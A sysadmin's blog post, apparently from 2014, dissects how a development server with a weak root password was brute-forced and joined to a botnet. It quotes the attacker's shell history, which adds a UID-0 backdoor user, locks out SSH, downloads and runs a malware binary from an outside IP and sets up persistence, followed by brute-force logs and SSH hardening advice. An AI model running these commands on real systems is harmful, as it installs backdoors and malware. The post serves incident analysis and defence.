An Anatomy Of A Hack – Weak ROOT Password

So a peaceful Sunday night, I get an odd bandwidth warning for a development/testing server that a developer recently created. It was doing some fairly immense traffic, peaking at 80mb a second and averaging about 8mb/s – definitely not normal.

Image 2014-08-31 at 8.42.18 PM

I tried to access the server via SSH but couldn’t connect at all, port 22 was connection reset by peer (which indicates a block or drop) and our normal port wasn’t responding at all.

I accessed the server via the Linode LISH console, but it wasn’t accepting any of our secure passwords, so I shut it down and used the Linode manager to reset the root password. This then allowed me to boot it up and access it via LISH with the root user.

What I discovered next was the reason why I couldn’t SSH in either on port 22 the default port, or our regular SSH port (which is not 22). I could see from these lines in the .bash_history for root that SSH had been blocked for everyone except 2 IP addresses.

    9  echo "sshd:121.12.168.62"  >> /etc/hosts.allow
   10  echo "sshd:37.48.73.19"  >> /etc/hosts.allow
   11  echo "sshd:ALL"  >> /etc/hosts.deny

Which would prevent any SSH access at all.

So they logged in, created a user called restart, blocked everyone but 2 IP addresses from accessing via SSH, then downloaded a piece of malware (or what I assume to be a botnet client) from the first IP address http://121.12.168.62:6789/com

Then they ran this, and added it to /etc/rc.local to make sure it runs on restart. Here’s the full history:

    1  w
    2  uname -a
    3  ethtool eth0
    4  ifconfiog
    5  ifconfig
    6  last
    7  useradd -g 0 -u 0 -o restart
    8  echo restart:restart |chpasswd
    9  echo "sshd:121.12.168.62"  >> /etc/hosts.allow
   10  echo "sshd:37.48.73.19"  >> /etc/hosts.allow
   11  echo "sshd:ALL"  >> /etc/hosts.deny
   12  cd /tmp/scp
   13  ls
   14  chmod 777 *
   15  ./x 5.153
   16  ls
   17  chmod 777 *
   18  ./x 5.153
   19  cd /etc
   20  wget http://121.12.168.62:6789/com
   21  chmod 0755 com
   22  ./com &
   23  chattr +i com
   24  echo "cd  /root/">>/etc/rc.local
   25  echo "./com&">>/etc/rc.local
   26  echo "/etc/init.d/iptables stop">>/etc/rc.local

I uploaded the malware to VirusTotal to scan it and see what it turned up:

VirusTotal Scan

The only decent description I found was from Telus:

Backdoor.Linux.Ganiw.A is a Backdoor and Bot agent that targets the Linux platform. The malware contacts a remote server, identifying itself, and sending system information. In addition, it receives control commands to perform various nefarious activities on the infected system. Moreover, the malware has the capabilities to embark on different types of DoS attacks. To survive a system reboot, it adds an entry to the initialization directory “/etc/init.d”.

As for the actual entry, it seems like the password was popped by a different IP address (Also from China), and then later on the same day, it was logged into by our main IP address 121.12.168.62.

Aug 30 01:46:43 li737-216 sshd[20132]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:46:45 li737-216 sshd[20134]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:46:47 li737-216 sshd[20134]: Failed password for root from 60.172.228.102 port 4670 ssh2
Aug 30 01:46:58 li737-216 sshd[20134]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 4670 ssh2]
Aug 30 01:46:58 li737-216 sshd[20134]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:00 li737-216 sshd[20136]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:01 li737-216 sshd[20136]: Failed password for root from 60.172.228.102 port 4526 ssh2
Aug 30 01:47:12 li737-216 sshd[20136]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 4526 ssh2]
Aug 30 01:47:12 li737-216 sshd[20136]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:14 li737-216 sshd[20138]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:15 li737-216 sshd[20138]: Failed password for root from 60.172.228.102 port 3781 ssh2
Aug 30 01:47:25 li737-216 sshd[20138]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 3781 ssh2]
Aug 30 01:47:25 li737-216 sshd[20138]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:27 li737-216 sshd[20140]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:29 li737-216 sshd[20140]: Failed password for root from 60.172.228.102 port 4405 ssh2
Aug 30 01:47:39 li737-216 sshd[20140]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 4405 ssh2]
Aug 30 01:47:39 li737-216 sshd[20140]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:41 li737-216 sshd[20144]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:44 li737-216 sshd[20144]: Failed password for root from 60.172.228.102 port 1662 ssh2
Aug 30 01:47:54 li737-216 sshd[20144]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 1662 ssh2]
Aug 30 01:47:54 li737-216 sshd[20144]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:55 li737-216 sshd[20146]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:57 li737-216 sshd[20146]: Failed password for root from 60.172.228.102 port 4220 ssh2
Aug 30 01:47:57 li737-216 sshd[20146]: Accepted password for root from 60.172.228.102 port 4220 ssh2

Then the login:

Aug 30 01:47:57 li737-216 sshd[20146]: Accepted password for root from 60.172.228.102 port 4220 ssh2
Aug 30 10:17:56 li737-216 sshd[21293]: Accepted password for root from 121.12.168.62 port 3117 ssh2

As a rule I disable root login via SSH, move it to a different port (not 22), disable password based logins, and use a limited list of users that can access SSH. This makes it pretty secure and can be done with the following SSH settings:

Port 888
PermitRootLogin no
PasswordAuthentication no
AllowUsers YOURALLOWEDUSER

Then restart SSHd of course. Generally choose a port below 1024, as then it’s still a privileged port and can’t be hijacked by a non-root user (for the paranoid).

This server was only 11 days old, fortunately it has nothing important on it and doesn’t have access to anything else. Just be warned, even if you are disabling root login later, put a secure password in from the start..as you might forget about the server for a while.

And then it’ll get owned by some Chinese hacker and turned into part of their botnet for hire.

There’s really not ever any excuse to have a weak root password.

Comments

comments

Subscribe

You can subscribe via e-mail to get my posts in your Inbox, or stalk me on numerous other platforms.

Follow my Dayre!

, , , , , , , , ,


2 Responses to An Anatomy Of A Hack – Weak ROOT Password

  1. Savoia di Lucania September 3, 2014 at 8:32 pm #

    So I have to question why a server was built without a basic security policy which includes the things you later implemented? Especially on developer boxes, which are common targets…

    • ShaolinTiger September 3, 2014 at 11:54 pm #

      Some senior devs have access to create nodes, we do have a tight security policy and a script that sets everything up.

      But he didn’t run the script (he thought he had) then he went on holiday and forgot about it.